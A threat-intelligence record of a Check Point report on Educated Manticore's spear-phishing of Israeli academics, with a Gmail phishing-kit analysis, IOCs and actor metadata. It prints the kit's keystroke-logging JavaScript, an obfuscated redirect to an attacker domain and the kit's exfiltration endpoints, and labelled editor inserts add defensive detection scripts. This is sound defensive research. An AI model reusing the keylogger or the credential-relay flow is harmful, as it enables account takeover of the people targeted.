{
	"id": "bac3339e-92b3-4383-a56e-c304f9500210",
	"created_at": "2026-04-06T00:22:37.988684Z",
	"updated_at": "2026-04-10T03:36:00.857438Z",
	"deleted_at": null,
	"sha1_hash": "88e6c0507028884b56f837182b43f2648f5f0083",
	"title": "Iranian Educated Manticore Targets Leading Tech Academics - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 102696,
	"plain_text": "Iranian Educated Manticore Targets Leading Tech Academics -\r\nCheck Point Research\r\nBy samanthar@checkpoint.com\r\nPublished: 2025-06-25 · Archived: 2026-04-05 15:47:29 UTC\r\nKey findings\r\nAmid ongoing tensions between Iran and Israel, the Iranian threat group Educated Manticore, associated with the Islamic Revolutionary Guard Corps, has launched spear-phishing campaigns targeting Israeli journalists, high-profile cyber security experts and computer science professors from leading Israeli universities.\r\nIn some of those campaigns, Israeli technology and cyber security professionals were approached by attackers who posed as fictitious assistants to technology executives or researchers, through emails and WhatsApp messages.\r\nThe threat actors directed victims who engaged with them to fake Gmail login pages or Google Meet invitations. Credentials entered on these phishing pages are sent to the attackers, enabling them to intercept both passwords and 2FA codes and gain unauthorized access to the victims’ accounts.\r\nCheck Point Research continues to track the large and evolving cluster of infrastructure used to facilitate credential harvesting in support of Educated Manticore’s cyber-espionage activities.\r\nIntroduction\r\nFor the last few years, Check Point Research has been monitoring the activity of the Iranian APT group Educated Manticore. This group aligns with activity tracked by the wider security community as APT42, Charming Kitten, or Mint Sandstorm, and is believed to operate on behalf of the Islamic Revolutionary Guard Corps’ Intelligence Organization (IRGC-IO).\r\nOver the years, Educated Manticore has consistently used spear-phishing as a core tactic to target individuals across government, military, research, media, and policy sectors. 
In addition to developing and deploying custom backdoors such as CharmPower (aka POWERSTAR) and PowerLess, the group has conducted numerous targeted phishing campaigns, including some aimed at senior officials and their PII and identity documents.\r\nOne of the group’s long-running operations targets Israeli individuals with fake meeting invitations. Attackers impersonate a wide range of personas, from high-ranking individuals to journalists or researchers, to gain credibility and lure victims into interaction. Victims are then directed to custom phishing kits designed to harvest credentials for their Google, Outlook, or Yahoo accounts. In some reported cases, this has compromised Israeli journalists’ accounts. Following the outbreak of the Iran–Israel war, we observed a new phase of this campaign in which Educated Manticore began using the names and credibility of cybersecurity companies to gain their victims’ trust, focusing on renowned academic experts in cyber security and computer technology.\r\nhttps://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics\r\nPage 1 of 13\n\nInitial Vector: Spear-phishing\r\nStarting mid-June, top cyber and computer science experts from leading Israeli universities were approached by individuals impersonating fictitious employees of cybersecurity companies, either by email or in WhatsApp messages.\r\nFigure 1 – Initial email impersonating a fictitious Threat Intelligence Analyst.\r\nJudging by the formal tone, structured layout, and error-free grammar, the email appears to have been crafted with AI assistance. 
However, despite its polished writing, some observant targets noticed signs that revealed it was fake: for instance, a mismatch between the name in the email body, “Sarah Novominski”, and the sender’s email account name, “Sara Noviminski”.\r\nAnother message, sent via WhatsApp to a different target, leverages the current tensions between Iran and Israel to lure the recipient into an urgent meeting. Interestingly, in this case the threat actors also suggest meeting in person in Tel Aviv. This could be a tactic aimed at securing quicker confirmation of an online meeting. However, given the history of Iranian operations, the possibility that this campaign extends beyond cyberspace cannot be entirely ruled out.\r\nFigure 2 – Part of a WhatsApp message impersonating a fictitious employee of a cybersecurity company.\r\nIn all cases, the initial message contains no links, but the attackers quickly gain the victims’ trust through prompt and persuasive interactions, ultimately guiding them to an online meeting link that leads to attacker-controlled phishing infrastructure.\r\nGoogle Authentication Custom Phishing Kit\r\nBefore sending the phishing link, the threat actors ask the victim for their email address. This address is then pre-filled on the credential phishing page to increase credibility and mimic the appearance of a legitimate Google Authentication flow.\r\nFigure 3 – Link to the phishing page sent via WhatsApp to one of the targets. 
The target communicates in Hebrew and refuses to use the link because it suspiciously asks for credentials.\nThe phishing kit used by Educated Manticore is implemented as a Single Page Application (SPA) built with React. It is tightly bundled, minified, and obfuscated. The main HTML page is minimal: its only static text is the fallback message shown below, and all visible UI is rendered dynamically by JavaScript (main.a184cc65.js in the example analyzed here) once the app loads:\nYou need to enable JavaScript to run this app.\nDue to its Single Page Application (SPA) nature, the page is never reloaded during navigation between steps, and it doesn’t perform traditional full-page form submissions. Instead, it uses React Router to update views client-side, submits data asynchronously via POST to the backend API, and dynamically renders each authentication step using React components based on the authentication session state.\nIn the main.a184cc65.js bundle from the above example, the backend is hosted at https://idea-home[.]online:8569 . To initiate the phishing flow, the kit sends a POST request to /info/param with JSON announcing the new victim connection:\n{\n  \"sk\": \"\",\n  \"sub_d\": \"\",\n  \"link\": \"\",\n  \"ip\": \"\", // placeholder 0.0.0.1\n  \"user_agent\": \"\"\n}\nThe host, combined with the search string (or path) of the link, forms the complete URL that the victim clicked, which the server uses to identify the victim. 
In response, the server returns a JSON payload containing task-specific configuration, such as which authentication screen to display and any pre-filled victim email address to use:\n{\r\n  \"id\": \"\u003csession key\u003e\", // Session key to track victim\r\n  \"path\": \"gl_password\", // Next screen to show\r\n  \"link\": \"\", // Optional: redirect URL\r\n  \"inputs\": [ // Prefilled input fields\r\n    { \"key\": \"email\", \"content\": \"\u003cemail of victim\u003e\" },\r\n  ]\r\n}\r\nThe steps the victim is led through on the phishing page depend on their account’s security settings. 
The kit handles all of the following logical steps supported by Google Authentication mechanisms:\r\nKey                  Purpose\r\ngl_signin            Email/username entry form (1st step)\r\ngl_sms_code          Enter SMS verification code\r\ngl_password          Password input page\r\ngl_verify            “Verify it’s you” prompt (e.g., challenge)\r\ngl_tab               Tab-based phone prompt\r\ngl_prompt            “Yes/No” type approval\r\ngl_email_code        Code sent to email\r\ngl_phone_number      Enter the last digits of the phone number\r\ngl_security_code     Manual code entry (TOTP/SMS)\r\ngl_authenticator     Google Authenticator UI\r\ngl_not_found         Fallback screen if page ID not found\r\ngl_qr_code           QR scan for 2FA setup\r\ngl_change_password   Password reset screen\r\ngl_no_signin         Generic “not signed in” or error screen\r\nBy supporting these authentication flows, the kit enables 2FA relay attacks, in which the threat actor uses the stolen password and one-time code to complete MFA against the legitimate service while the code is still valid. Data entered by the victim at each step (password, MFA token, etc.) is sent via POST requests to the /key/send API endpoint:\r\n{\r\n  \"sk\": \"\u003csession key\u003e\",\r\n  \"content\": \"\u003cuser input\u003e\", // e.g., password or 2FA code\r\n  \"page\": \"gl_password\" // Current step (e.g., gl_password, gl_verify, ..)\r\n}\r\nThe kit also maintains a persistent WebSocket connection on /sessions , which is opened at page load and remains active throughout the session. It includes a passive keylogger that captures every keystroke and transmits it live. 
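Worked example, added by the editor and not part of the Check Point report: a Python triage script that recognizes this kit’s backend protocol in a captured browsing session and reports how far each victim got. The endpoint paths (/info/param, /key/send, /sessions), the JSON field names and the gl_* step identifiers are the report’s; the d: kl marker on keystroke frames is taken from the report’s keylogger excerpt. The capture format (a list of already-parsed HTTP and WebSocket events) and every value in it are constructed for this example.

```python
# Added example (editor's code, not from the Check Point report): recognize the
# Educated Manticore Gmail kit's traffic in a captured browsing session and report
# how far each victim got. Endpoint paths, JSON field names and gl_* step ids are
# taken from the report; the capture format and all values below are constructed.
from collections import defaultdict

# Step identifiers the Gmail-themed kit renders (the report's table).
GL_STEPS = {
    'gl_signin', 'gl_sms_code', 'gl_password', 'gl_verify', 'gl_tab', 'gl_prompt',
    'gl_email_code', 'gl_phone_number', 'gl_security_code', 'gl_authenticator',
    'gl_not_found', 'gl_qr_code', 'gl_change_password', 'gl_no_signin',
}
# Steps whose submitted value is a one-time code the attacker can relay to Google.
MFA_STEPS = {'gl_sms_code', 'gl_email_code', 'gl_security_code', 'gl_authenticator'}
# Field sets of the two backend calls described in the report.
INFO_KEYS = {'sk', 'sub_d', 'link', 'ip', 'user_agent'}   # POST /info/param
SEND_KEYS = {'sk', 'content', 'page'}                      # POST /key/send


def classify(event):
    '''Match one captured event against the kit's protocol.
    event is a dict: kind is http or ws; http events carry method, path, body (parsed
    JSON) and response (parsed JSON); ws events carry path and frame (parsed JSON).
    Returns (tag, session_key, step) on a match, otherwise None.'''
    if event['kind'] == 'http' and event['method'] == 'POST':
        body = event.get('body') or {}
        if event['path'].endswith('/info/param') and INFO_KEYS <= set(body):
            resp = event.get('response') or {}   # server answers with id + next path
            return ('kit-init', resp.get('id'), resp.get('path'))
        if event['path'].endswith('/key/send') and SEND_KEYS <= set(body) and body['page'] in GL_STEPS:
            return ('kit-submit', body['sk'], body['page'])
    if event['kind'] == 'ws' and event['path'].endswith('/sessions'):
        frame = event.get('frame') or {}
        if frame.get('d') == 'kl' and 'sk' in frame and 'c' in frame:   # keylogger frame
            return ('kit-keylog', frame['sk'], frame.get('page'))
    return None


def summarize(events):
    '''Group matches by the kit's session key (sk) and record which steps were reached.
    The submitted values themselves are deliberately not kept.'''
    fresh = lambda: {'steps': [], 'keystrokes': 0, 'password_entered': False, 'mfa_entered': False}
    sessions = defaultdict(fresh)
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        tag, sk, step = hit
        s = sessions[sk]
        if tag == 'kit-keylog':
            s['keystrokes'] += 1
            continue
        s['steps'].append(step)
        if tag == 'kit-submit':
            s['password_entered'] |= step == 'gl_password'
            s['mfa_entered'] |= step in MFA_STEPS
    return dict(sessions)


# Constructed capture: one victim is pre-filled, types a password, then a TOTP code;
# two benign events (a real sign-in POST, an unrelated WebSocket) must not match.
SAMPLE_EVENTS = [
    {'kind': 'http', 'method': 'POST', 'path': '/info/param',
     'body': {'sk': '', 'sub_d': 'idea-home.online', 'link': '/meet', 'ip': '0.0.0.1', 'user_agent': 'Mozilla/5.0'},
     'response': {'id': 'S1', 'path': 'gl_password', 'link': '', 'inputs': [{'key': 'email', 'content': 'target@example.org'}]}},
    {'kind': 'ws', 'path': '/sessions', 'frame': {'d': 'kl', 'c': 'h', 'sk': 'S1', 'page': 'gl_password'}},
    {'kind': 'ws', 'path': '/sessions', 'frame': {'d': 'kl', 'c': 'Enter', 'sk': 'S1', 'page': 'gl_password'}},
    {'kind': 'http', 'method': 'POST', 'path': '/key/send',
     'body': {'sk': 'S1', 'content': 'hunter2', 'page': 'gl_password'}, 'response': {}},
    {'kind': 'http', 'method': 'POST', 'path': '/key/send',
     'body': {'sk': 'S1', 'content': '482913', 'page': 'gl_security_code'}, 'response': {}},
    {'kind': 'http', 'method': 'POST', 'path': '/v3/signin/identifier', 'body': {'identifier': 'x'}, 'response': {}},
    {'kind': 'ws', 'path': '/chat', 'frame': {'d': 'msg', 'c': 'hi'}},
]

if __name__ == '__main__':
    for sk, s in summarize(SAMPLE_EVENTS).items():
        print(sk, s)
```

Run it directly to print one summary per session key. A session with both password_entered and mfa_entered means a password and a relayable one-time code both left the browser, which calls for an immediate password reset and revocation of the account’s active sessions; keystrokes counts keylogger frames, so a non-zero count with no submitted steps still means the victim typed into the page.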
Each key event sent is marked with d: \"kl\" (“keylogger”). In the excerpt below, as read from the code, n is the /sessions WebSocket, e is the current step (page), ls maps key codes to key names, and t is a flag that suppresses sending when set:\r\n(0, s.useEffect)((() =\u003e {\r\n    const a = async a =\u003e {\r\n        try {\r\n            // send only while the socket (n) exists and capture is not suppressed (t)\r\n            n \u0026\u0026 !t \u0026\u0026 n.send(JSON.stringify({\r\n                d: \"kl\",  // frame type: keylogger\r\n                c: a.which in ls ? ls[a.which] : a.key,  // key name from the ls table, else the raw key\r\n                sk: localStorage.getItem(\"sk\"),  // victim session key\r\n                page: e  // phishing step the victim is on\r\n            }))\r\n        } catch (s) {\r\n            console.log(\"error in socket =\u003e \", s)\r\n        }\r\n    };\r\n    // hook every keydown on the window; unhook when the component unmounts\r\n    return window.addEventListener(\"keydown\", a), () =\u003e window.removeEventListener(\"keydown\", a)\r\n}), [t, e, n])\r\nIn addition to collecting inputs when a specific step is submitted, this keylogger records every character typed, even if the user abandons the form or never submits it.\r\nThe WebSocket connection also lets the server push dynamic updates back to the victim’s browser, so the attackers can redirect the victim to a specific fake page or step at any time.\r\nFake Google Meet invitations\r\nSome meeting invitations utilized multi-stage phishing pages hosted on the Google Sites service ( sites.google.com ), a tactic employed by the threat actors in recent years and designed to add legitimacy to the link by using the Google 
domain.\r\nFigure 4 – A legitimate link (on the right) that the target wanted to use vs. a link to a malicious Google Meet page (on the left) that the threat actors insist on using.\nThe fake page is designed to resemble a legitimate Google Meet meeting page. However, once the junk and obfuscated code is removed, the underlying structure is quite simple: it displays a hardcoded image.\nFigure 5 – Fake image redirecting to the attackers’ servers.\nThe page has three versions tailored for desktop, tablet, and phone devices. All function identically: when the user clicks on the image, they are redirected to the attacker’s website, which hosts phishing pages mimicking Google’s authentication process. The target URL is assembled from string fragments at click time, so it never appears as a whole in the page source:\n\u003cimg src=\"data:image/png;base64,[base64-encoded image]\"\u003e\n[code omitted]\ndocument.getElementById(\"desktop\").onclick=()=\u003e{ window.open(\"https\" + \":\" + \"//sendly-ink\" + \".\" + \"shop/YtgtyyzP\")\n[code omitted]\nInfrastructure\nWe assess that the threat actors started using the custom phishing kit described above in January 2025. In addition to Google/Gmail phishing pages, the threat actor has similar React-based phishing kits for Outlook and Yahoo email in their toolset. Both are observed far less often than the Gmail pages. 
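Worked example, added by the editor and not from the report: a Python helper that recovers the click target hidden by the fragment concatenation shown above and fingerprints a phishing-kit bundle by its step identifiers and backend paths. The window.open() concatenation, the /info/param, /key/send and /sessions paths and the gl_, yh_ and out_ route prefixes of the Gmail, Yahoo and Outlook kits are taken from the report; the page and bundle snippets embedded in the code are constructed stand-ins written with single-quoted literals (the scanner accepts either quote character), not the real files.

```python
# Added example (editor's code, not from the Check Point report): two static checks for
# this actor's pages. decode_window_open_targets() reassembles the click target that the
# fake Google Meet page hides as concatenated string fragments; fingerprint_bundle()
# classifies a phishing-kit bundle by the step identifiers and backend paths it carries.
# The concatenation pattern, the paths and the gl_/yh_/out_ prefixes come from the report;
# both sample inputs below are constructed stand-ins, not the real files.
QUOTES = (chr(34), chr(39))   # double-quote and single-quote characters


def decode_window_open_targets(js):
    '''Return the URL passed to each window.open( ... ) call, with the string literals
    of the argument concatenated in order (fragments joined with + collapse to one URL).
    Scanning stops at the first ) outside a literal; escape sequences are not handled.'''
    targets = []
    marker = 'window.open('
    pos = js.find(marker)
    while pos != -1:
        parts = []
        i = pos + len(marker)
        while i < len(js) and js[i] != ')':
            if js[i] in QUOTES:                     # literal: copy up to the matching quote
                close = js.find(js[i], i + 1)
                if close == -1:
                    break
                parts.append(js[i + 1:close])
                i = close + 1
            else:                                   # operator, space or identifier: skip
                i += 1
        targets.append(''.join(parts))
        pos = js.find(marker, i)
    return targets


def defang(url):
    '''Make a URL safe to paste into a report (hxxps://host[.]tld/path).'''
    scheme, sep, rest = url.partition('://')
    host, slash, path = rest.partition('/')
    head, dot, tld = host.rpartition('.')
    if dot:
        host = head + '[.]' + tld
    return scheme.replace('http', 'hxxp') + sep + host + slash + path


def string_literals(js):
    '''Yield every quoted literal in js in order (same simple scanner as above).'''
    i = 0
    while i < len(js):
        if js[i] in QUOTES:
            close = js.find(js[i], i + 1)
            if close == -1:
                return
            yield js[i + 1:close]
            i = close + 1
        else:
            i += 1


KIT_PREFIXES = {'gl_': 'Google/Gmail', 'yh_': 'Yahoo', 'out_': 'Outlook'}
KIT_PATHS = ('/info/param', '/key/send', '/sessions')


def fingerprint_bundle(js):
    '''Count step identifiers per kit family and note which backend paths appear.'''
    found = {family: set() for family in KIT_PREFIXES.values()}
    for lit in string_literals(js):
        for prefix, family in KIT_PREFIXES.items():
            rest = lit[len(prefix):]
            if lit.startswith(prefix) and rest and rest.replace('_', '').isalnum():
                found[family].add(lit)
    family = max(found, key=lambda f: len(found[f]))
    return {'family': family if found[family] else None,
            'steps': sorted(found[family]),
            'api_paths': [p for p in KIT_PATHS if p in js]}


# Constructed stand-in for the Google Sites page (single-quoted literals).
SAMPLE_SITES_PAGE = '''document.getElementById('desktop').onclick=()=>{ window.open('https' + ':' + '//sendly-ink' + '.' + 'shop/YtgtyyzP') }'''
# Constructed stand-in for a minified kit bundle.
SAMPLE_BUNDLE = '''r.push({path:'gl_signin'}),r.push({path:'gl_password'}),r.push({path:'gl_security_code'}),fetch(b+'/key/send',{method:'POST'}),new WebSocket(w+'/sessions')'''

if __name__ == '__main__':
    for url in decode_window_open_targets(SAMPLE_SITES_PAGE):
        print(defang(url))
    print(fingerprint_bundle(SAMPLE_BUNDLE))
```

Defanged output matches the IOC style used in this report and is safe to paste elsewhere. The scanner deliberately ignores escape sequences, regex literals and comments, so treat a fingerprint as a lead to confirm by reading the bundle, not as a verdict.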
The Yahoo phishing page behaves similarly to the Gmail-themed kit: it uses route identifiers prefixed with yh_ (such as yh_signin , yh_password , yh_enter_code , etc.) to manage the flow between authentication steps, and includes a similar passive keylogger that captures every keystroke in real time. The Outlook phishing kit also uses React Router to manage the progression of phishing steps, but it doesn’t expose route paths in the URL. Instead, steps are labelled internally (e.g., page: \"out_signin\" , page: \"out_2FA_email\" , page: \"out_authenticator_app\" , etc.), making the flow consistent with the Gmail and Yahoo kits, though with less explicit route naming.\nFrom January 2025 onward, the threat actors registered many domains that have been used for targeted phishing operations, either hosting phishing kits or serving as their backend. The underlying infrastructure relied on more than 130 unique domains (along with numerous subdomains), resolving to a dozen distinct IP addresses. Most of these domains are registered with the NameCheap registrar.\r\nThe older IPs from this infrastructure cluster match the public fingerprint of GreenCharlie, which we consider a sub-cluster of Educated Manticore, with many of the domains following the same naming patterns.\r\nConclusion\r\nEducated Manticore continues to pose a persistent and high-impact threat, particularly to individuals in Israel during the escalation phase of the Iran-Israel conflict. Despite increased exposure by the cybersecurity community, the group continues to operate steadily, characterized by aggressive spear-phishing, rapid setup of domains, subdomains, and infrastructure, and fast-paced takedowns when identified. 
This agility allows them to remain effective under heightened scrutiny.\r\nThe custom phishing kit used in Educated Manticore campaigns closely imitates familiar login pages, like those from Google, using modern web technologies such as React-based Single Page Applications (SPA) and dynamic page routing. It also uses real-time WebSocket connections to send stolen data, and the design allows it to hide its code from additional scrutiny.\r\nGiven the vulnerable nature of their targets, who often operate in sensitive or trust-based environments with external peers, we assess that Educated Manticore’s tactics will continue to focus on stealing identities and credentials linked to the regime’s interests.\r\nIOCs\r\nIPs:\r\n185.130.226[.]71\r\n45.12.2[.]158\r\n45.143.166[.]230\r\n91.222.173[.]141\r\n194.11.226[.]9\r\n195.66.213[.]132\r\n146.19.254[.]238\r\n194.11.226[.]29\r\n194.11.226[.]46\r\n194.61.120[.]185\r\n2.56.126[.]230\r\n194.11.226[.]5\r\nDomains:\r\nconn-ectionor[.]cfd\r\noptio-nalynk[.]online\r\nques-tion-ing[.]xyz\r\nsendly-ink[.]shop\r\nshaer-likn[.]store\r\nalison624[.]online\r\nbestshopu[.]online\r\nblack-friday-store[.]online\r\nidea-home[.]online\r\nbook-handwrite[.]online\r\nworld-shop[.]online\r\nlenan-rex[.]online\r\nfirst-course[.]online\r\nreading-course[.]online\r\nmake-house[.]online\r\nest5090[.]online\r\nzra-roll[.]online\r\ntomas-company[.]online\r\nclame-rade[.]online\r\ndmn-for-hall[.]online\r\nword-course[.]online\r\nclothes-show[.]online\r\nexpressmarket[.]online\r\nloads-ideas[.]online\r\nsky-writer[.]online\r\nbecker624[.]online\r\nadams-cooling[.]online\r\nstadium-fresh[.]online\r\nroyalsoul[.]online\r\nlive-message[.]online\r\nteammate-live[.]online\r\nwood-house[.]online\r\nude-final[.]online\r\ncity-splash[.]online\r\ndoor-black-meter[.]online\r\nprt-max[.]online\r\nalbert-company[.]online\r\nhuman-fly900[.]online\r\ndmn-for-car[.]online\r\ngood-student[.]online\r\ngoods-companies[.]online\r\npnl-worth[.]online\r\nricardo-mell[.]online\r\nlive-coaching[.]online\r\nwer-d[.]info\r\nspring-club[.]info\r\nall-for-city[.]info\r\nbeta-man[.]info\r\namg-car-ger[.]info\r\ncc-newton[.]info\r\nsteve-brown[.]info\r\nconnect-room[.]online\r\nlive-gml[.]online\r\nroland-cc[.]online\r\nexir-juice[.]online\r\nyamal-group[.]online\r\nlive-conn[.]online\r\nonline-room[.]online\r\nplatinum-cnt[.]info\r\ncrysus-h[.]info\r\nlynda-tricks[.]online\r\nmessage-live[.]online\r\nwhite-life-bl[.]info\r\nmeet-work[.]info\r\nprj-ph[.]info\r\nhrd-dmn[.]info\r\nntp-clock-h[.]info\r\nwork-meeting[.]info\r\nph-crtdomain[.]info\r\nnsim-ph[.]info\r\nwarning-d[.]info\r\nlive-meet[.]cloud\r\nlive-meet[.]blog\r\nlive-meet[.]info\r\nlive-meet[.]cfd\r\nlive-meet[.]live\r\nnetwork-show[.]online\r\nredirect-review[.]online\r\narizonaclub[.]me\r\nbackback[.]info\r\ncloth-model[.]blog\r\ncook-tips[.]info\r\nnetwork-review[.]xyz\r\nsocks[.]beauty\r\ngallery-shop[.]online\r\nnetwork-game[.]xyz\r\ngood-news[.]cfd\r\nnetwork-show-a[.]online\r\npanel-network[.]online\r\npanel-redirect[.]online\r\nencryption-redirect[.]online\r\nthomas-mark[.]xyz\r\nrap-art[.]info\r\nanna-blog[.]info\r\narrow-click[.]info\r\nbest85best[.]online\r\nshadow-network[.]best\r\ngood-news[.]fashion\r\nwarplogic[.]pro\r\ncyberlattice[.]pro\r\nshow-verify[.]xyz\r\ntop-game[.]online\r\nsuite-moral[.]info\r\nnice-goods[.]online\r\ncrysus-p[.]info\r\nwash-less[.]online\r\nptr-cc[.]online\r\nwhite-car[.]online\r\nlive-content[.]online\r\nbracs-lion[.]online\r\nstorm-wave[.]online\r\ncourse-math[.]info\r\nfood-tips-blog[.]online\r\nwhite-life[.]info\r\nph-work[.]info\r\nnormal-dmn[.]info\r\npanel-meeting[.]info\r\nprj-pa[.]info\r\nntp-clock-p[.]info\r\nnsim-pa[.]info\r\npa-crtdomain[.]info\r\ninfinit-world[.]info\r\nalex-mendez-fire[.]info\r\nreg-d[.]info\r\neverything-here[.]info\r\nhealthy-lifestyle[.]fit\r\nalpha-man[.]info\r\nlesson-first[.]info\r\nmaster-club[.]info\r\nSource: https://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2025/iranian-educated-manticore-targets-leading-tech-academics"
	],
	"report_names": [
		"iranian-educated-manticore-targets-leading-tech-academics"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c398d083-1e86-4cee-8937-eb057f0e6fdc",
			"created_at": "2022-10-25T16:07:24.172423Z",
			"updated_at": "2026-04-10T02:00:04.888972Z",
			"deleted_at": null,
			"main_name": "Shadow Network",
			"aliases": [],
			"source_name": "ETDA:Shadow Network",
			"tools": [
				"ShadowNet"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d0e8337e-16a7-48f2-90cf-8fd09a7198d1",
			"created_at": "2023-03-04T02:01:54.091301Z",
			"updated_at": "2026-04-10T02:00:03.356317Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"UNC788",
				"CALANQUE"
			],
			"source_name": "MISPGALAXY:APT42",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7d8ef10e-1d7b-49a0-ab6e-f1dae465a1a4",
			"created_at": "2023-01-06T13:46:38.595679Z",
			"updated_at": "2026-04-10T02:00:03.033762Z",
			"deleted_at": null,
			"main_name": "PLATINUM",
			"aliases": [
				"TwoForOne",
				"G0068",
				"ATK33"
			],
			"source_name": "MISPGALAXY:PLATINUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e61c46f7-88a1-421a-9fed-0cfe2eeb820a",
			"created_at": "2022-10-25T16:07:24.061767Z",
			"updated_at": "2026-04-10T02:00:04.854503Z",
			"deleted_at": null,
			"main_name": "Platinum",
			"aliases": [
				"ATK 33",
				"G0068",
				"Operation EasternRoppels",
				"TwoForOne"
			],
			"source_name": "ETDA:Platinum",
			"tools": [
				"AMTsol",
				"Adupib",
				"Adupihan",
				"Dipsind",
				"DvDupdate.dll",
				"JPIN",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"RedPepper",
				"RedSalt",
				"Titanium",
				"adbupd",
				"psinstrc.ps1"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "172e5e21-e954-4322-9317-41f2cbaed7f1",
			"created_at": "2023-01-06T13:46:38.992713Z",
			"updated_at": "2026-04-10T02:00:03.174179Z",
			"deleted_at": null,
			"main_name": "Shadow Network",
			"aliases": [],
			"source_name": "MISPGALAXY:Shadow Network",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "51258c82-52c1-4a82-b5f6-105f8e0cac57",
			"created_at": "2024-10-25T02:02:07.722918Z",
			"updated_at": "2026-04-10T02:00:04.713878Z",
			"deleted_at": null,
			"main_name": "GreenCharlie",
			"aliases": [],
			"source_name": "ETDA:GreenCharlie",
			"tools": [
				"CharmPower",
				"GORBLE",
				"GorjolEcho",
				"NOKNOK",
				"POWERSTAR",
				"TAMECAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8",
			"created_at": "2025-04-23T02:00:55.275208Z",
			"updated_at": "2026-04-10T02:00:05.270553Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"APT42"
			],
			"source_name": "MITRE:APT42",
			"tools": [
				"NICECURL",
				"TAMECAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
